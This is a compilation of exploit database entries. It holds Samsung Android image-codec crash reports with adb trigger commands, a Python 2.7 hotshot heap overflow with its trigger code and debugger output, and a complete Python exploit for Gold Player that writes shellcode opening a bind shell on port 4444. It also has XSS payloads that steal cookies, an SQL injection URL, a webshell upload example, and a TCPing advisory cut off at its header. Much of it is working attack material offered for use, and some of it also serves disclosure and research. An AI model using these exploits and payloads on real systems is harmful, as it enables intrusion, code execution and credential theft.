The pc is set to the value of content of the JPEG file, indicating that this issue could probably be exploited to allow code execution. We believe the issue is caused due to a flaw in libQjpeg.so (third-party Quram Qjpeg library).

To reproduce the issue, download the file and wait for media scanning to occur, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0

This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38614.zip
HireHackking 
Title: Python 2.7 hotshot pack_string Heap Buffer Overflow
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-hotshot-pack_string-Heap-Buffer-Overflow
Url2: http://bugs.python.org/issue24481
Resolution: Fixed

The Python 2.7 hotspot module suffer from a heap buffer overflow due to a memcpy in the pack_string function at line 633:

static int
pack_string(ProfilerObject *self, const char *s, Py_ssize_t len)
{
    if (len + PISIZE + self->index >= BUFFERSIZE) {
        if (flush_data(self) < 0)
            return -1;
    }
    assert(len < INT_MAX);
    if (pack_packed_int(self, (int)len) < 0)
        return -1;
    memcpy(self->buffer + self->index, s, len);
    self->index += len;
    return 0;
}

The problem arises because const char *s is variable length, while ProfilerObject.buffer is fixed-length:

typedef struct {
    PyObject_HEAD
    PyObject *filemap;
    PyObject *logfilename;
    Py_ssize_t index;
    unsigned char buffer[BUFFERSIZE];
    FILE *logfp;
    int lineevents;
    int linetimings;
    int frametimings;
    /* size_t filled; */
    int active;
    int next_fileno;
    hs_time prev_timeofday;
} ProfilerObject;

An overflow can be triggered by passing a large string to the Profile.addinfo method via the value parameter:

from hotshot.stats import *
x = hotshot.Profile("A", "A")
x.addinfo("A", "A" * 0xfceb)

Which produces the following exception:

0:000> r
eax=00000041 ebx=0000fceb ecx=00003532 edx=00000002 esi=075dcb35 edi=075d9000
eip=6c29af1c esp=0027fc78 ebp=0027fc80 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSVCR90!LeadUpVec+0x70:
6c29af1c f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> db edi-0x10
075d8ff0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075d9000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
075d9010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
075d9020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
075d9030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
075d9040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
075d9050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
075d9060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:000> db esi
075dcb35  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075dcb45  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075dcb55  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075dcb65  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075dcb75  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075dcb85  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075dcb95  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
075dcba5  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000> !heap -p -a edi
    address 075d9000 found in
    _DPH_HEAP_ROOT @ 6ca1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 722809c:          75d67c8             2838 -          75d6000             4000
    6c3194ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
    77a257b7 ntdll!RtlDebugAllocateHeap+0x0000003c
    779c77ce ntdll!RtlpAllocateHeap+0x0004665a
    77981134 ntdll!RtlAllocateHeap+0x0000014d
    6c2c3db8 MSVCR90!malloc+0x00000079 [f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.c @ 163]
    1e0ae6d1 python27!PyObject_Malloc+0x00000161 [c:\build27\cpython\objects\obmalloc.c @ 968]

 
0:000> !heap -p -a esi
    address 075dcb35 found in
    _DPH_HEAP_ROOT @ 6ca1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 7228068:          75da300             fd00 -          75da000            11000
    6c3194ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
    77a257b7 ntdll!RtlDebugAllocateHeap+0x0000003c
    779c77ce ntdll!RtlpAllocateHeap+0x0004665a
    77981134 ntdll!RtlAllocateHeap+0x0000014d
    6c2c3db8 MSVCR90!malloc+0x00000079 [f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.c @ 163]
    1e0ae6d1 python27!PyObject_Malloc+0x00000161 [c:\build27\cpython\objects\obmalloc.c @ 968]

 
0:000> k4
ChildEBP RetAddr  
0027fc80 1e008380 MSVCR90!LeadUpVec+0x70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
0027fc90 1e008407 python27!pack_string+0x40 [c:\build27\cpython\modules\_hotshot.c @ 634]
0027fca8 1e0089bb python27!pack_add_info+0x77 [c:\build27\cpython\modules\_hotshot.c @ 652]
0027fcc0 1e0aafd7 python27!profiler_addinfo+0x5b [c:\build27\cpython\modules\_hotshot.c @ 1020]
0:000> .frame 1
01 0027fc90 1e008407 python27!pack_string+0x40 [c:\build27\cpython\modules\_hotshot.c @ 634]
0:000> dV
           self = 0x075dcb35
              s = 0x075da314 "AAAAAAAAAAAAAAAAAAA[...]AA..."
            len = 0n123572224
0:000> dt self
Local var @ esi Type ProfilerObject*
   +0x000 ob_refcnt        : 0n1094795585
   +0x004 ob_type          : 0x41414141 _typeobject
   +0x008 filemap          : 0x41414141 _object
   +0x00c logfilename      : 0x41414141 _object
   +0x010 index            : 0n1094795585
   +0x014 buffer           : [10240]  "AAAAAAAAAAAAAAAAAAA[...]AA..."
   +0x2814 logfp            : 0x41414141 _iobuf
   +0x2818 lineevents       : 0n1094795585
   +0x281c linetimings      : 0n1094795585
   +0x2820 frametimings     : 0n1094795585
   +0x2824 active           : 0n1094795585
   +0x2828 next_fileno      : 0n1094795585
   +0x2830 prev_timeofday   : 0n4702111234474983745

0:000> !analyze -v -nodb
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
MSVCR90!LeadUpVec+70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
6c29af1c f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 6c29af1c (MSVCR90!LeadUpVec+0x00000070)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 075d9000
Attempt to write to address 075d9000

CONTEXT:  00000000 -- (.cxr 0x0;r)
eax=00000041 ebx=0000fceb ecx=00003532 edx=00000002 esi=075dcb35 edi=075d9000
eip=6c29af1c esp=0027fc78 ebp=0027fc80 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSVCR90!LeadUpVec+0x70:
6c29af1c f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

FAULTING_THREAD:  000013b0

PROCESS_NAME:  pythonw.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  075d9000

WRITE_ADDRESS:  075d9000 

FOLLOWUP_IP: 
MSVCR90!LeadUpVec+70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
6c29af1c f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

NTGLOBALFLAG:  2000000

APPLICATION_VERIFIER_FLAGS:  0

APP:  pythonw.exe

ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre

BUGCHECK_STR:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_NXCODE

PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE

DEFAULT_BUCKET_ID:  STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE

LAST_CONTROL_TRANSFER:  from 1e008380 to 6c29af1c

STACK_TEXT:  
0027fc80 1e008380 075d67df 075da314 0000fceb MSVCR90!LeadUpVec+0x70
0027fc90 1e008407 075da314 1e008960 00000000 python27!pack_string+0x40
0027fca8 1e0089bb 072e67b4 075da314 0769e788 python27!pack_add_info+0x77
0027fcc0 1e0aafd7 075d67c8 071aabc0 0769e788 python27!profiler_addinfo+0x5b
0027fcd8 1e0edd10 0769e788 071aabc0 00000000 python27!PyCFunction_Call+0x47
0027fd04 1e0f017a 0027fd5c 06d57b18 06d57b18 python27!call_function+0x2b0
0027fd74 1e0f1150 071a9870 00000000 06d57b18 python27!PyEval_EvalFrameEx+0x239a
0027fda8 1e0f11b2 06d57b18 071a9870 06d5ba50 python27!PyEval_EvalCodeEx+0x690
0027fdd4 1e11707a 06d57b18 06d5ba50 06d5ba50 python27!PyEval_EvalCode+0x22
0027fdec 1e1181c5 0722e260 06d5ba50 06d5ba50 python27!run_mod+0x2a
0027fe0c 1e118760 6c2f7408 06d17fac 00000101 python27!PyRun_FileExFlags+0x75
0027fe4c 1e1190d9 6c2f7408 06d17fac 00000001 python27!PyRun_SimpleFileExFlags+0x190
0027fe68 1e038d35 6c2f7408 06d17fac 00000001 python27!PyRun_AnyFileExFlags+0x59
0027fee4 1d001017 00000002 06d17f88 1d0011b6 python27!Py_Main+0x965
0027fef0 1d0011b6 1d000000 00000000 04d3ffa8 pythonw!WinMain+0x17
0027ff80 76477c04 7ffde000 76477be0 63080f16 pythonw!__tmainCRTStartup+0x140
0027ff94 7799ad1f 7ffde000 62fa2f53 00000000 KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7799acea ffffffff 77980228 00000000 ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 1d001395 7ffde000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  .cxr 0x0 ; kb

FAULTING_SOURCE_LINE:  f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm

FAULTING_SOURCE_FILE:  f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm

FAULTING_SOURCE_LINE_NUMBER:  289

FAULTING_SOURCE_CODE:  
No source found for 'f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm'


SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  msvcr90!LeadUpVec+70

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: MSVCR90

IMAGE_NAME:  MSVCR90.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  51ea24a5

FAILURE_BUCKET_ID:  STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE_c0000005_MSVCR90.dll!LeadUpVec

BUCKET_ID:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_NXCODE_msvcr90!LeadUpVec+70

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:string_dereference_exploitable_fill_pattern_nxcode_c0000005_msvcr90.dll!leadupvec

FAILURE_ID_HASH:  {006f2a1a-db5d-7798-544b-da0c2e0bcf19}

Followup: MachineOwner
---------

To fix the issue, pack_string should confirm that the fixed-length buffer is of sufficient size prior to performing the memcpy.
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=497

Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.

I/DEBUG   ( 2961): pid: 12383, tid: 12549, name: thread-pool-1  >>> com.sec.android.gallery3d <<<
I/DEBUG   ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000

I/DEBUG   ( 2961):     x0   0000000089e8117c  x1   00000000000000ff  x2   00000000177fe13c  x3   0000000089e8117c
I/DEBUG   ( 2961):     x4   0000000000000004  x5   0000007f65f42300  x6   0000000000000002  x7   ffffffffffffffff
I/DEBUG   ( 2961):     x8   0000000089e83ff0  x9   0000007f65f020b0  x10  000000000000003c  x11  000000000000003b
I/DEBUG   ( 2961):     x12  0000007f65f02080  x13  00000000ffffffff  x14  0000007f65f02080  x15  00000000000061e0
I/DEBUG   ( 2961):     x16  0000007f6baccc10  x17  0000007f958f8d80  x18  0000007f9596da40  x19  0000007f65f0e180
I/DEBUG   ( 2961):     x20  0000007f65f54020  x21  00000000002f0020  x22  0000000000000020  x23  0000000005e00400
I/DEBUG   ( 2961):     x24  0000000000000004  x25  0000007f65f42300  x26  0000000000000020  x27  0000007f65f52080
I/DEBUG   ( 2961):     x28  00000000000001da  x29  0000000013071460  x30  0000007f6ba7e40c
I/DEBUG   ( 2961):     sp   0000007f66796130  pc   0000007f958f8e28  pstate 0000000020000000
I/DEBUG   ( 2961): 
I/DEBUG   ( 2961): backtrace:
I/InjectionManager(12532): Inside getClassLibPath caller 
I/DEBUG   ( 2961):     #00 pc 0000000000019e28  /system/lib64/libc.so (memset+168)
I/DEBUG   ( 2961):     #01 pc 0000000000030408  /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
I/DEBUG   ( 2961):     #02 pc 0000000000033440  /system/lib64/libSecMMCodec.so (DecodeFile+120)
I/DEBUG   ( 2961):     #03 pc 000000000000c90c  /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG   ( 2961):     #04 pc 000000000042ec00  /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex

To reproduce, download the file and open it in Gallery.

This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38613.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=498

The attached jpg, upsample.jpg can cause memory corruption when media scanning occurs

F/libc    ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG   ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG   ( 2956): Revision: '10'
I/DEBUG   ( 2956): ABI: 'arm64'
I/DEBUG   ( 2956): pid: 8600, tid: 8685, name: HEAVY#0  >>> com.samsung.dcm:DCMService <<<
I/DEBUG   ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG   ( 2956):     x0   0000007f8cef2ab0  x1   0000000000000002  x2   0000007f8cef2ab0  x3   0000007f8ce5a390
I/DEBUG   ( 2956):     x4   0000007f8cef28d0  x5   3d206e6f69747562  x6   0000007f8cef29f0  x7   42e34ca342e32177
I/DEBUG   ( 2956):     x8   42e390a242e37199  x9   42dfe02f42debc0f  x10  42e06c3442e03665  x11  42e0afd542e08c24
I/DEBUG   ( 2956):     x12  42e1070042e0e62d  x13  42e1830842e146da  x14  42e1f53342e1add4  x15  00000000000014a4
I/DEBUG   ( 2956):     x16  0000007f9f0d6ae0  x17  0000007fa3e7e880  x18  0000007f8ce75c60  x19  0000007f8cebe000
I/DEBUG   ( 2956):     x20  0000000000000001  x21  0000007f8cebe000  x22  0000000000000001  x23  0000000000000000
I/DEBUG   ( 2956):     x24  0000000000000000  x25  0000000000000000  x26  0000000010000000  x27  0000007f8c5ff050
I/DEBUG   ( 2956):     x28  0000007f8ce77800  x29  000000000000001c  x30  0000007f9f09fff8
I/DEBUG   ( 2956):     sp   0000007f8d0fea20  pc   0000007f9f09e83c  pstate 0000000080000000
I/DEBUG   ( 2956): 
I/DEBUG   ( 2956): backtrace:
I/DEBUG   ( 2956):     #00 pc 000000000009b83c  /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG   ( 2956):     #01 pc 000000000009cff4  /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG   ( 2956):     #02 pc 0000000000035700  /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG   ( 2956):     #03 pc 0000000000041f08  /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG   ( 2956):     #04 pc 00000000000428d4  /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG   ( 2956):     #05 pc 0000000000042a08  /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG   ( 2956):     #06 pc 000000000004420c  /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG   ( 2956):     #07 pc 00000000000a4234  /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG   ( 2956):     #08 pc 0000000000001b98  /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG   ( 2956):     #09 pc 0000000000001418  /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG   ( 2956):     #10 pc 00000000000018ec  /system/framework/arm64/saiv.odex

To reproduce, download the image file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=500

There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.

D/skia    (10905): GIF - Parse error
D/skia    (10905): --- decoder->decode returned false
F/libc    (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
I/DEBUG   ( 2958): pid: 10905, tid: 11276, name: thread-pool-0  >>> com.sec.android.gallery3d <<<
I/DEBUG   ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
I/DEBUG   ( 2958):     x0   0000000000000001  x1   0000000089f725ac  x2   0000000000000000  x3   00000000fff9038c
I/DEBUG   ( 2958):     x4   0000007f9c300000  x5   000000000000001f  x6   0000000000000001  x7   0000007f9c620048
I/DEBUG   ( 2958):     x8   0000000000000000  x9   0000000000000000  x10  0000000000000080  x11  0000000000003758
I/DEBUG   ( 2958):     x12  0000000000000020  x13  0000000000000020  x14  00000000000000a5  x15  000000000000001f
I/DEBUG   ( 2958):     x16  00000000ffffe4e3  x17  00000000000000a5  x18  0000007f9c300000  x19  0000007f9c61fc00
I/DEBUG   ( 2958):     x20  0000007f9c664080  x21  0000000089e76b2c  x22  000000000000003b  x23  0000000000000001
I/DEBUG   ( 2958):     x24  0000000000000020  x25  0000000000000020  x26  0000000000000020  x27  0000007f9c664080
I/DEBUG   ( 2958):     x28  00000000000001da  x29  0000000032e89ae0  x30  0000007faad70e64
I/DEBUG   ( 2958):     sp   0000007f9cfff170  pc   0000007faad72dbc  pstate 0000000080000000
I/DEBUG   ( 2958): 
I/DEBUG   ( 2958): backtrace:
I/DEBUG   ( 2958):     #00 pc 000000000002ddbc  /system/lib64/libSecMMCodec.so (ColorMap+200)
I/DEBUG   ( 2958):     #01 pc 000000000002be60  /system/lib64/libSecMMCodec.so (decodeGIF+340)
I/DEBUG   ( 2958):     #02 pc 000000000000c90c  /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG   ( 2958):     #03 pc 000000000042ec00  /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex

To reproduce, download the file and open it in Gallery

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38610.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=499

The attached files cause memory corruption when they are scanned by the face recognition library in android.media.process.

From faces-art.bmp

F/libc    (11305): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 11555 (Thread-1136)
I/DEBUG   ( 2955): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 2955): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG   ( 2955): Revision: '10'
I/DEBUG   ( 2955): ABI: 'arm64'
I/DEBUG   ( 2955): pid: 11305, tid: 11555, name: Thread-1136  >>> android.process.media <<<
I/DEBUG   ( 2955): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
I/DEBUG   ( 2955):     x0   0000007f94ca2100  x1   0000007f94c63480  x2   0000007f94c0e200  x3   0000000000000000
I/DEBUG   ( 2955):     x4   0000000000000000  x5   0000000000000040  x6   000000000000003f  x7   0000000000000000
I/DEBUG   ( 2955):     x8   0000007f94c0e240  x9   0000000000000004  x10  000000000000003b  x11  000000000000003a
I/DEBUG   ( 2955):     x12  0000007f94c02080  x13  00000000ffffffff  x14  0000007f94c02080  x15  000000000151c5e8
I/DEBUG   ( 2955):     x16  0000007f885fe900  x17  0000007f9ee60d80  x18  0000007f9eed5a40  x19  0000007f94c1d100
I/DEBUG   ( 2955):     x20  0000000000000000  x21  0000007f94c65150  x22  0000007f949d0550  x23  0000007f94c1d110
I/DEBUG   ( 2955):     x24  0000000012d39070  x25  0000000000000066  x26  0000000012d23b80  x27  0000000000000066
I/DEBUG   ( 2955):     x28  0000000000000000  x29  0000007f949cfd70  x30  0000007f87acd200
I/DEBUG   ( 2955):     sp   0000007f949cfd70  pc   0000000000000000  pstate 0000000040000000
I/DEBUG   ( 2955): 
I/DEBUG   ( 2955): backtrace:
I/DEBUG   ( 2955):     #00 pc 0000000000000000  <unknown>
I/DEBUG   ( 2955):     #01 pc 0000000000000001  <unknown>
I/DEBUG   ( 2955):     #02 pc 26221b0826221b08  <unknown>

To reproduce, download the attached file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38611.zip
HireHackking 
#!/usr/bin/python
# EXPLOIT TITLE: GOLD PLAYER Local Exploit
# AUTHOR: Vivek Mahajan - C3p70r
# Credits: Gabor Seljan  
# Date of Testing: 30 October 2015
# Download Link : http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html
# Tested On : Windows 8.1 Pro and Windows 7 Ultimate
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called buffer.txt
# Step 3: Open the file buffer.txt and copy the contents.
# Step 4: Open the Gold Player application -> file -> open flash url and paste the contents
# Step 5: Click on Open
# That should open a bind tcp port at 4444
# Step 4: Connect with netcat at port 4444


buffer = "A"*280

buffer += "\x83\x34\x04\x10"

buffer += "\x90"*100

buffer += ("\xba\x01\x75\x34\x3a\xdb\xd4\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x53\x31\x57\x12\x03\x57\x12\x83\xc6\x71\xd6\xcf\x34\x91\x94"
"\x30\xc4\x62\xf9\xb9\x21\x53\x39\xdd\x22\xc4\x89\x95\x66\xe9"
"\x62\xfb\x92\x7a\x06\xd4\x95\xcb\xad\x02\x98\xcc\x9e\x77\xbb"
"\x4e\xdd\xab\x1b\x6e\x2e\xbe\x5a\xb7\x53\x33\x0e\x60\x1f\xe6"
"\xbe\x05\x55\x3b\x35\x55\x7b\x3b\xaa\x2e\x7a\x6a\x7d\x24\x25"
"\xac\x7c\xe9\x5d\xe5\x66\xee\x58\xbf\x1d\xc4\x17\x3e\xf7\x14"
"\xd7\xed\x36\x99\x2a\xef\x7f\x1e\xd5\x9a\x89\x5c\x68\x9d\x4e"
"\x1e\xb6\x28\x54\xb8\x3d\x8a\xb0\x38\x91\x4d\x33\x36\x5e\x19"
"\x1b\x5b\x61\xce\x10\x67\xea\xf1\xf6\xe1\xa8\xd5\xd2\xaa\x6b"
"\x77\x43\x17\xdd\x88\x93\xf8\x82\x2c\xd8\x15\xd6\x5c\x83\x71"
"\x1b\x6d\x3b\x82\x33\xe6\x48\xb0\x9c\x5c\xc6\xf8\x55\x7b\x11"
"\xfe\x4f\x3b\x8d\x01\x70\x3c\x84\xc5\x24\x6c\xbe\xec\x44\xe7"
"\x3e\x10\x91\x92\x36\xb7\x4a\x81\xbb\x07\x3b\x05\x13\xe0\x51"
"\x8a\x4c\x10\x5a\x40\xe5\xb9\xa7\x6b\x18\x66\x21\x8d\x70\x86"
"\x67\x05\xec\x64\x5c\x9e\x8b\x97\xb6\xb6\x3b\xdf\xd0\x01\x44"
"\xe0\xf6\x25\xd2\x6b\x15\xf2\xc3\x6b\x30\x52\x94\xfc\xce\x33"
"\xd7\x9d\xcf\x19\x8f\x3e\x5d\xc6\x4f\x48\x7e\x51\x18\x1d\xb0"
"\xa8\xcc\xb3\xeb\x02\xf2\x49\x6d\x6c\xb6\x95\x4e\x73\x37\x5b"
"\xea\x57\x27\xa5\xf3\xd3\x13\x79\xa2\x8d\xcd\x3f\x1c\x7c\xa7"
"\xe9\xf3\xd6\x2f\x6f\x38\xe9\x29\x70\x15\x9f\xd5\xc1\xc0\xe6"
"\xea\xee\x84\xee\x93\x12\x35\x10\x4e\x97\x45\x5b\xd2\xbe\xcd"
"\x02\x87\x82\x93\xb4\x72\xc0\xad\x36\x76\xb9\x49\x26\xf3\xbc"
"\x16\xe0\xe8\xcc\x07\x85\x0e\x62\x27\x8c")

buffer += ".swf"

file = open('buffer.txt', 'w')
file.write(buffer)
file.close()


# Follow on Twitter @vik_create
HireHackking 
source: https://www.securityfocus.com/bid/60860/info

The Xorbin Analog Flash Clock plugin is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Xorbin Analog Flash Clock 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/xorbin-analog-flash-clock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1);
HireHackking 
source: https://www.securityfocus.com/bid/60859/info

Atomy Maxsite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Atomy Maxsite versions 1.50 through 2.5 are vulnerable. 

http://www.example.com/[path]/index.php?name=research&file=add&op=research_add
HireHackking 
source: https://www.securityfocus.com/bid/60853/info

Nameko is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Nameko 0.10.146 and prior are vulnerable. 

http://www.example.com/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66
HireHackking 
source: https://www.securityfocus.com/bid/60847/info

Mobile USB Drive HD is prone to multiple local file-include and arbitrary file-upload vulnerabilities because it fails to adequately validate files before uploading them.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

Mobile USB Drive HD 1.2 is vulnerable; other versions may also be affected. 

<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href=_http://www.example.com/files/webshell-js.php.png.txt.iso.php.gif; 
class="file">webshell-js.php.png.txt.iso.php.gif</a></td>
HireHackking 
source: https://www.securityfocus.com/bid/60854/info

WP Private Messages plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
HireHackking 
'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt


Vendor:
================================
Spetnik.com
http://tcping.soft32.com/free-download/


Product:
=================================
Spetnik TCPing 2.1.0 / tcping.exe
circa 2007

